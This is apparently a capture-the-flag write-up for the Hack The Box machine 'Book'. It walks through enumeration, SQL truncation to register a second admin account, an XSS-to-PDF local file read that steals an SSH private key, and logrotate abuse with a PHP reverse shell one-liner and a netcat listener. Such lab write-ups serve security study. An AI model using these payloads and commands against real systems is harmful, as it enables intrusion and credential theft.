Enumeration
Nmap
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
bros@Bros10:~/HTB/Book$ nmap -sV -sC -oA scans 10.10.10.176
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-10 14:59 BST
Nmap scan report for 10.10.10.176
Host is up (0.056s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 f7:fc:57:99:f6:82:e0:03:d6:03:bc:09:43:01:55:b7 (RSA)
| 256 a3:e5:d1:74:c4:8a:e8:c8:52:c7:17:83:4a:54:31:bd (ECDSA)
|_ 256 e3:62:68:72:e2:c0:ae:46:67:3d:cb:46:bf:69:b9:6a (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: LIBRARY - Read | Learn | Have Fun
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.45 seconds
From the nmap scan we can see that there are just 2 ports open, we see know that anonymous login for SSH isn’t allowed as the nmap scan would of picked that up due to us running the-sC flag to execute scripts. So we shall then navigate to the website.
Foothold
When arriving at the site we are greeted with a login portal, where we can both login and create an account. So we create an account and then take a look around the site.
As we can see there are a few aspects to the website and one aspect which catches my eye is the ability to submit a Book. We can see that we can submit a Book Title, author and then upload a file. Meaning we may be able to upload a reverse shell of some sort. However I had no success with this, one other thing I noticed and put into my notes was that within the Contact Us page it stated that to contact an admin it would send an email to admin@book.htb therefore we can now try and login in as the admin as we know what email they used. After running a dirb scan I found this:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
bros@Bros10:~/HTB/Book$ dirb http://10.10.10.176/
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Fri Jul 10 15:07:13 2020
URL_BASE: http://10.10.10.176/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.10.10.176/ ----
==> DIRECTORY: http://10.10.10.176/admin/
So we go over to /admin and attempt to authenticate our self as an admin, now we could brute force this form but that’s never the correct way for a HTB machine so the initial thing I try is simple SQL injection but get no success. I then also tried sqlmap but that had 0 success, after reading through some checklists and articles around bypassing login forms I came across SQL Truncation. After some research I found that if MySQL is running in default mode, the database column is limited to 20 characters so any string past 20 characters would be truncated by MySQL. As MySQL doesn’t compare strings in binary mode it results in seeing “admin “ and “admin” as the same string, so it wouldn’t accept a new user named “admin “. However if a user inputs “admin .”, which is 21 characters, then it will be seen as a different username and would be accepted inserted it into the database. But the 21 character string would be cut down to 20 characters turning the string from “admin .” to “admin “. This results in MySQL comparing both strings in non binary mode, allowing you to create a 2nd admin account with a set of credentials you set.
Now we shall take this vulnerability and convert it to work within this Box, we notice that the unique identifier for an account is the email and not the username. Therefore we can create a new account with any username and just set the email as admin@book.htb A
However there is some validation within this form for the email aspect so we remove the spaces and the A, turn on our Burp proxy and intercept the request and edit the Raw POST request. We make these changes to the POST parameters: name=bros&email=admin%40book.htb A&password=bros. This results in the email being 21 characters long, the application will compare this email which now is admin@book.htb A to any other email addresses within the database but won’t get a match as strings are compared in non binary mode. Allowing the information to be inserted into the database. However due to it’s length the string will be truncated, removing the A, creating a new user named bros who’s email is also admin@book.htb meaning we can login into the admin panel using admin@book.htb and our password which is bros. Here is what the Admin Panel looked like:
Where we can navigate to Collections and this is what we can see:
Here we can download the PDF of users and Collections. Now we know that within the Library aspect of the source we can upload a “Book” to the Collections tab, where we can put a “Book Title”, “Author” and a file.
After doing some research I came across this article which allows an attacker to abuse XSS to obtain a local file which is then output as a pdf. After a few attempts this payload worked while also uploading a text file as the file.
1
2
bros@Bros10:~/HTB/Book$ cat file.txt
PleaseReadMyWriteup
Payload:
1
<script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};x.open("GET","file:///etc/passwd");x.send();</script>
After clicking upload we go over to our Admin tab where we refresh and then download both the PDF’s for Collections and Users. Once we open up the PDF from Collections we get the output of /etc/passwd
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:wwwdata:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats
Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemdnetwork:x:100:102:systemd Network
Management,,,:/run/systemd/netif:/usr/sbin/nologin systemdresolve:x:101:103:systemd
Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
reader:x:1000:1000:reader:/home/reader:/bin/bash
mysql:x:111:114:MySQL Server,,,:/nonexistent:/bin/false
So we now know that we can output contents of Local files, so while looking at /etc/passwd I noticed this user: reader:x:1000:1000:reader:/home/reader:/bin/bash who was most likely the user responsible for hosting the web server. Therefore I attempted to grab the private SSH key which should be at this location /home/reader/.ssh/id_rsa which we can confirm the location of by testing it locally.
1
2
3
4
bros@Bros10:~/.ssh$ ls
id_rsa id_rsa.pub known_hosts
bros@Bros10:~/.ssh$ pwd
/home/bros/.ssh
After uploading the same text file and changing the payload to this: <script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};x.open("GET","file:///home/reader/.ssh/id_rsa");x.send();</script>. We succeed and when we download the PDF and open it up using Chrome we copy and paste the contents and obtain the private SSH key.
1
2
3
-----BEGIN RSA PRIVATE KEY-----
MIIEpQIBAAKCAQEA2JJQsccK6fE05OWbVGOuKZdf0FyicoUrrm821nHygmLgWSpJ
-----END RSA PRIVATE KEY-----
User
SSH in as reader and obtain the User flag.
1
2
3
4
5
6
7
8
bros@Bros10:~/HTB/Book$ ls
file.txt id_rsa scans.gnmap scans.nmap scans.xml
bros@Bros10:~/HTB/Book$ chmod 600 id_rsa
bros@Bros10:~/HTB/Book$ ssh -i id_rsa reader@10.10.10.176
reader@book:~$ ls
backups lse.sh user.txt
reader@book:~$ cat user.txt
51c
Root
We begin the process of Privilege Escalation by getting linpeas onto the machine.
1
curl http://10.10.14.36:8000/linpeas.sh -o linpeas.sh
1
2
3
4
5
bros@Bros10:~/HTB/Tools$ ls
LinEnum.sh linpeas.sh
bros@Bros10:~/HTB/Tools$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.10.176 - - [11/Jul/2020 17:50:51] "GET /linpeas.sh HTTP/1.1" 200 -
And then once we run it we find this:
1
2
3
4
5
6
[+] Writable log files (logrotten) (limit 100)
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#logrotate-exploitation
#)You_can_write_more_log_files_inside_last_directory
#)You_can_write_more_log_files_inside_last_directory
#)You_can_write_more_log_files_inside_last_directory
Writable: /home/reader/backups/access.log
After reading the article from the link provided and then finding a PoC I clone the git repo.
1
bros@Bros10:~/HTB/Book$ git clone https://github.com/whotwagner/logrotten
Compile the PoC and then serve it using python again.
1
2
bros@Bros10:~/HTB/Book/logrotten$ gcc logrotten.c -o logrotten
bros@Bros10:~/HTB/Book/logrotten$ python3 -m http.server
1
2
3
reader@book:~$ vim shell
reader@book:~$ cat shell
php -r '$sock=fsockopen("10.10.xx.xx",2222);exec("/bin/sh -i <&3 >&3 2>&3");'
As a reminder you need to insert your IP address within the reverse shell above.
1
reader@book:~$ ./logrotten -p ./shell /home/reader/backups/access.log
The -p flag specifies the payload, meaning our PHP reverse shell should be executed by root. However this won’t occur straight away as we’ve got to wait till root executes logrotate. We can make logrotate occur by creating and running this quick bash scripts within the /backups folder.
1
2
3
4
5
6
#!/bin/bash
while true; do
sleep 100
echo "AAAA" > access.log
done
Then in another terminal we shall set a listener on port 2222 and wait for a connection.
1
2
3
4
5
6
7
8
9
10
bros@Bros10:~/HTB/Book/logrotten$ nc -lvnp 2222
listening on [any] 2222 ...
connect to [10.10.14.36] from (UNKNOWN) [10.10.10.176] 59792
# whoami
root
# cat .ssh/id_rsa
-----BEGIN RSA PRIVATE KEY-----
-----END RSA PRIVATE KEY-----
# Hangup
As we can see above the Shell is very unstable and drops within a few seconds, so to get a stable shell I did ran ls -lah and noticed the .ssh directory therefore outputted the value of the Root RSA private key. Allowing me to copy and paste the private key into id_rsa on my local machine.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
bros@Bros10:~/HTB/Tools/root$ chmod 600 id_rsa
bros@Bros10:~/HTB/Tools/root$ ssh -i id_rsa root@10.10.10.176
Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 5.4.1-050401-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Sat Jul 11 17:34:40 UTC 2020
System load: 0.03 Processes: 158
Usage of /: 26.6% of 19.56GB Users logged in: 1
Memory usage: 35% IP address for ens33: 10.10.10.176
Swap usage: 0%
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
114 packages can be updated.
0 updates are security updates.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Sat Jul 11 17:34:01 2020 from ::1
PHP Warning: fsockopen(): unable to connect to 10.10.14.36:2222 (Connection refused) in Command line code on line 1
sh: 1: 3: Bad file descriptor
root@book:~# whoami
root
Conclusion
Found two ports open upon our initial scan, we then move onto the Website where we can Login, create an account. Once we created a test account we navigate to a Contact Us page where we noticed the admin@book.htb email. We also had the functionality to upload a book which includes a Book title, author and the file itself. From there we use dirb to find the /admin which we know we could login using the admins email address. We creating an Admin account with our own username and credentials by using SQL Truncation and then use XSS to read local files by rendering them within a PDF utilising the user Book upload feature and the admin PDF download for collections of books. From there we obtain the users SSH private key and SSH in. To obtain root we abuse logrotate to execute a PHP reverse shell allowing us to grab the roots SSH private key.